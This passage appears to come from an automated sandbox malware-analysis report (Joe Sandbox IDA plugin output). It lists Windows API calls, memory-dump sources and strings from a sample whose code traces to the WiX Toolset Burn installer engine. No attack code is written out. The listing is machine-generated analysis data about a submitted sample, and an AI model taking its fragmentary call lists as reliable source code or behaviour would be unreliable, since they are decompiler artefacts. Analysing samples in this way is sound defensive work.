                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                                                                                                                                                                                            • String ID: Attempted to check filename, but no filename was provided$Failed to check size of file %ls by handle$Failed to open file %ls while checking file size$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1722934493-3491284254
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,008E7C8C), ref: 0093B6F1
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0093B687
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008E7C8C,?,?,?,?,?,?,?), ref: 0093B693
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 1529210728-3252241749
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 008E8B61
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-118609244
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,00000000,008E15E3,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13ED
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E13F9
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E1444
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E1455
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                                                                                                                                            • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                                                                                                                                            • API String ID: 3392887714-1639946792
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000000,?), ref: 00924A38
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 00924C1C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • BA did not provide container or payload id., xrefs: 00924BF4
                                                                                                                                                                                                                                                                            • BA requested unknown payload with id: %ls, xrefs: 00924A9B
                                                                                                                                                                                                                                                                            • Failed to set download URL., xrefs: 00924B31
                                                                                                                                                                                                                                                                            • Failed to set download user., xrefs: 00924B65
                                                                                                                                                                                                                                                                            • Engine is active, cannot change engine state., xrefs: 00924A50
                                                                                                                                                                                                                                                                            • BA requested unknown container with id: %ls, xrefs: 00924AE3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 00924A62, 00924AF5, 00924C0B
                                                                                                                                                                                                                                                                            • Failed to set download password., xrefs: 00924B99
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: BA did not provide container or payload id.$BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-103459661
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,-80000001,56800040,00020019,00000001,008E6EDE,008E6DEA,00000000,008E6E32,008E6EDE,008E7162,008E6DEA), ref: 00912362
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to read QuietUninstallString., xrefs: 0091233A
                                                                                                                                                                                                                                                                            • Failed to compare versions., xrefs: 009122DC
                                                                                                                                                                                                                                                                            • Failed to read DisplayVersion., xrefs: 00912282
                                                                                                                                                                                                                                                                            • Failed to open registry key: %ls., xrefs: 00912226
                                                                                                                                                                                                                                                                            • DisplayVersion, xrefs: 00912256
                                                                                                                                                                                                                                                                            • QuietUninstallString, xrefs: 00912315
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\exeengine.cpp, xrefs: 00912238, 0091234C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: DisplayVersion$Failed to compare versions.$Failed to open registry key: %ls.$Failed to read DisplayVersion.$Failed to read QuietUninstallString.$QuietUninstallString$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-915021512
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,?,00000000), ref: 00946212
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to compare path from pending file rename to check path., xrefs: 00946221
                                                                                                                                                                                                                                                                            • Failed to read pending file renames., xrefs: 00946114
                                                                                                                                                                                                                                                                            • Failed to update pending file renames., xrefs: 009461DD
                                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 009460E8, 009461CA
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 009461EC
                                                                                                                                                                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00946085
                                                                                                                                                                                                                                                                            • Failed to open pending file rename registry key., xrefs: 009460C7
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1055086927
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F5C41: CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF), ref: 008F5C6E
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00907566
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to find package: %ls$Failed to read compatible package id.$Failed to read package id.$Failed to remove from cache compatible package: %ls$Package '%ls' has no compatible package to clean.$Package '%ls' has no compatible package with id: %ls$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-529956491
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009439DD: GetLastError.KERNEL32(?,?,?,008FCE21,?,00000000,00000000,00000000,00000000), ref: 009439FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009484E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                                                                                                                            • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 972348794-1106238538
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E165F: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0090EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 008E1673
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 008E65FF
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?), ref: 008E6615
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E661F
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008E6629
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B324: EnterCriticalSection.KERNEL32(0097D4F0,00000000,?,008E8067,00000000,00000000,?,?,?,?,?,?,?), ref: 0093B32E
                                                                                                                                                                                                                                                                              • Part of subcall function 0093B324: LeaveCriticalSection.KERNEL32(0097D4F0,?,008E8067,00000000,00000000,?,?,?,?,?,?,?), ref: 0093B345
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 008E66A6, 008E66C2, 008E66EF
                                                                                                                                                                                                                                                                            • Failed to wait log message over pipe., xrefs: 008E6666
                                                                                                                                                                                                                                                                            • Failed to wait for log thread events, signaled: %u., xrefs: 008E66DD
                                                                                                                                                                                                                                                                            • Failed to reset log event., xrefs: 008E66B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                                                                                                                                            • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3117541546-2819198451
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00944F04: lstrlenW.KERNEL32(008E7162,008E6DEA,?,?,?,00945488,008E7162,008E6DEA,008E6EC2,008E6DEA,008E6DEA,?,?,?,00900D28,0D8C6817), ref: 00944F2A
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,0094E7E8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,00000000,00000000,8000FFFF,?), ref: 00945735
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • default, xrefs: 00945672
                                                                                                                                                                                                                                                                            • version.dll, xrefs: 009455E1
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to "%ls"., xrefs: 00945677, 009456AB, 009456DC
                                                                                                                                                                                                                                                                            • Failed to create the dependency registry key "%ls"., xrefs: 00945648
                                                                                                                                                                                                                                                                            • Failed to allocate the registry key for dependency "%ls"., xrefs: 00945603
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00945612, 0094571F
                                                                                                                                                                                                                                                                            • Failed to set the %ls registry value to %d., xrefs: 00945710
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 3903209405-20855631
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to set last source., xrefs: 008FFDB2
                                                                                                                                                                                                                                                                            • WixBundleLastUsedSource, xrefs: 008FFD5F, 008FFD65, 008FFDA3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FFDC4
                                                                                                                                                                                                                                                                            • Failed to determine length of relative path., xrefs: 008FFCEF
                                                                                                                                                                                                                                                                            • Failed to trim source folder., xrefs: 008FFD48
                                                                                                                                                                                                                                                                            • Failed to determine length of source path., xrefs: 008FFCC5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-3313679279
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 009400C9
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009400D5
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009401C4
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 009401CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0094016F
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 00940107, 00940140
                                                                                                                                                                                                                                                                            • failed get_attributes, xrefs: 009400F8
                                                                                                                                                                                                                                                                            • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 00940131
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                                                                                                                                            • API String ID: 760788290-1291303398
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,008E47DC,?,00000000,00000000,00000000,0100147D), ref: 008E648B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1611563598-979167295
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(008E6CF2,00000000,7D8B5756,008E6CF2,00000000,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2,008E7162,008E6DEA,008E6EDE), ref: 008F0814
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F081F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F07D5, 008F0897
                                                                                                                                                                                                                                                                            • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 008F08AC
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F07FD
                                                                                                                                                                                                                                                                            • Failed to set directory search path variable., xrefs: 008F0850
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F07C3
                                                                                                                                                                                                                                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 008F0885
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to initialize file search.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1799206407-3281098314
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00919860,00000000,?), ref: 0094761D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00919860,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?), ref: 0094762B
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: GetProcessHeap.KERNEL32(?,00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E541C
                                                                                                                                                                                                                                                                              • Part of subcall function 008E540B: RtlAllocateHeap.NTDLL(00000000,?,008E5532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 008E5423
                                                                                                                                                                                                                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,00919860,00000000,?), ref: 00947682
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00919860,00000000,?,?,?,?,?,?,?,?,?,00919D0A,?,?), ref: 0094768C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate memory to get configuration.$Failed to query service configuration.$Failed to read service configuration.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\svcutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 355237494-3172380343
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(008E6CF2,00000000,7D8B5756,008E6CF2,00000000,008E7162,008E7162,008E6DEA,00000000,008E7162,00000000,008E6DEA,008E6CF2), ref: 008F0AA3
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008F0AAE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • File search: %ls, did not find path: %ls, xrefs: 008F0B33
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F0A64, 008F0AEE
                                                                                                                                                                                                                                                                            • Failed to set variable to file search path., xrefs: 008F0B17
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F0A8C
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0A52
                                                                                                                                                                                                                                                                            • Failed while searching file search: %ls, for path: %ls, xrefs: 008F0ADC
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                            • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1799206407-4156759458
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 0092631B
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00926333
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092637E
                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 00926395
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0092639E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get message from netfx chainer., xrefs: 009263BF
                                                                                                                                                                                                                                                                            • Failed to send files in use message from netfx chainer., xrefs: 009263EF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp, xrefs: 00926401
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                                                                                                                            • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2608678126-3113603724
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                                                                                                                            • String ID: <$PDv$ShellExecEx failed with return code: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3023784893-1662516666
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008F7CE9: lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 008F7D78
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Closelstrlen
                                                                                                                                                                                                                                                                            • String ID: %04u%02u%02u$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$InstallDate$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 008EA67C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0092A390
                                                                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0092A49E
                                                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0092A5F0
                                                                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0092A60B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,0094E860,000000FF,00000000,000000FF,00000000,00000000,?,008E6CF2,00000000), ref: 00918482
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00918541
                                                                                                                                                                                                                                                                            • Failed to copy target product code., xrefs: 009185AD
                                                                                                                                                                                                                                                                            • Failed to grow array of ordered patches., xrefs: 0091864E
                                                                                                                                                                                                                                                                            • Failed to plan action for target product., xrefs: 0091852F
                                                                                                                                                                                                                                                                            • Failed to insert execute action., xrefs: 009184E7
